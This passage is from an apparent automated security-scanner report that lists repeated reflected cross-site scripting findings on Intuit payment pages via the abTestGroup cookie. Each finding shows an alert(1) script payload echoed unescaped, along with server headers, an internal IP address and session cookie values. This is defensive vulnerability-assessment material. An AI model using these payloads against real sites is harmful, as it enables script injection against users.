Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101839

...[SNIP]...
<input id="testGroup" value="T163a8df"><script>alert(1)</script>8a97599db5e" type="hidden" />
...[SNIP]...

2.144. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe34"><script>alert(1)</script>e4428afd0e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=S54bRjiQv+uVCD7gvAdU-w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E93040A0805192AA117E381BE9E8D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134948

...[SNIP]...
<input id="testGroup" value="T16dbe34"><script>alert(1)</script>e4428afd0e2" type="hidden" />
...[SNIP]...

2.145. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e5954<script>alert(1)</script>7c1b1f23a20 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:51 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JTutGo4CW82kebKHmtahlQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:52 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96051670A0805192AA117E3B23F6A90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134934

...[SNIP]...
<br />
A/B Test Group: T16e5954<script>alert(1)</script>7c1b1f23a20<br />
...[SNIP]...

2.146. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 40826<script>alert(1)</script>6b3b3bfead2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JAU5jTsV01UQdVnkqg89xA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AE16F0A0805192AA117E34608F640
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658

...[SNIP]...
<br />
A/B Test Group: T1640826<script>alert(1)</script>6b3b3bfead2<br />
...[SNIP]...

2.147. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f63b"><script>alert(1)</script>2bccb2fa261 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=u7kvfkfqvaVK6w+qzqFzsg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95981070A0805192AA117E3490D5636
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92673

...[SNIP]...
<input id="testGroup" value="T161f63b"><script>alert(1)</script>2bccb2fa261" type="hidden" />
...[SNIP]...

2.148. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ae697<script>alert(1)</script>aec6008fd49 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tAv7LIDUwQblTJIPVSG6vw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614D8C0A0805192AA117E310637E4F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151814

...[SNIP]...
<br />
A/B Test Group: T16ae697<script>alert(1)</script>aec6008fd49<br />
...[SNIP]...

2.149. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671c4"><script>alert(1)</script>a7dc609c67f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bUbasadyi6fmev5ohVeXRg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FF17B0A0805192AA117E3CEC0F01D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151828

...[SNIP]...
<input id="testGroup" value="T16671c4"><script>alert(1)</script>a7dc609c67f" type="hidden" />
...[SNIP]...

2.150. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ac6ae<script>alert(1)</script>299a08e1cc6 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3dHufc-Aa20gfU8Z-4d3xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600CF00A0805192AA117E3E54E1420
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110761

...[SNIP]...
<br />
A/B Test Group: T16ac6ae<script>alert(1)</script>299a08e1cc6<br />
...[SNIP]...

2.151. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c27"><script>alert(1)</script>2c3cad478e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=og8RtTbm1WZuq3QVWh104A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E37AB0A0805192AA117E3FF7FB774
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110773

...[SNIP]...
<input id="testGroup" value="T16b0c27"><script>alert(1)</script>2c3cad478e" type="hidden" />
...[SNIP]...

2.152. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3b445<script>alert(1)</script>1d1b4924dde was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=U3+YzUdBpMmGMr2JBIzxEA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C018A0A0805192AA117E33D70DA63
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96470

...[SNIP]...
<br />
A/B Test Group: T163b445<script>alert(1)</script>1d1b4924dde<br />
...[SNIP]...

2.153. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c3d"><script>alert(1)</script>97f3c4b0963 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zfKFegXLRVzqLsEN5G1LJQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC4050A0805192AA117E3D09F65EC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96483

...[SNIP]...
<input id="testGroup" value="T1647c3d"><script>alert(1)</script>97f3c4b0963" type="hidden" />
...[SNIP]...

2.154. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83731"><script>alert(1)</script>8d0a1b75f18 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:16 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CUtOQX98VPCW+SKAA2O34A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:17 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DF3390A0805192AA117E3EF2B1833
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109447

...[SNIP]...
<input id="testGroup" value="T1683731"><script>alert(1)</script>8d0a1b75f18" type="hidden" />
...[SNIP]...

2.155. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d7ba9<script>alert(1)</script>df514fb9a00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l6UJNFXwWEDsLIgDbSXdhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F89450A0805192AA117E396BE25DA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109433

...[SNIP]...
<br />
A/B Test Group: T16d7ba9<script>alert(1)</script>df514fb9a00<br />
...[SNIP]...

2.156. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe97"><script>alert(1)</script>b605d5bc92b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-wYBl8vzIr2xsu7UV+rclQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9601C8F0A0805192AA117E375BEDB29
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475

...[SNIP]...
<input id="testGroup" value="T16bfe97"><script>alert(1)</script>b605d5bc92b" type="hidden" />
...[SNIP]...

2.157. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e3cdf<script>alert(1)</script>457e3b04e25 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

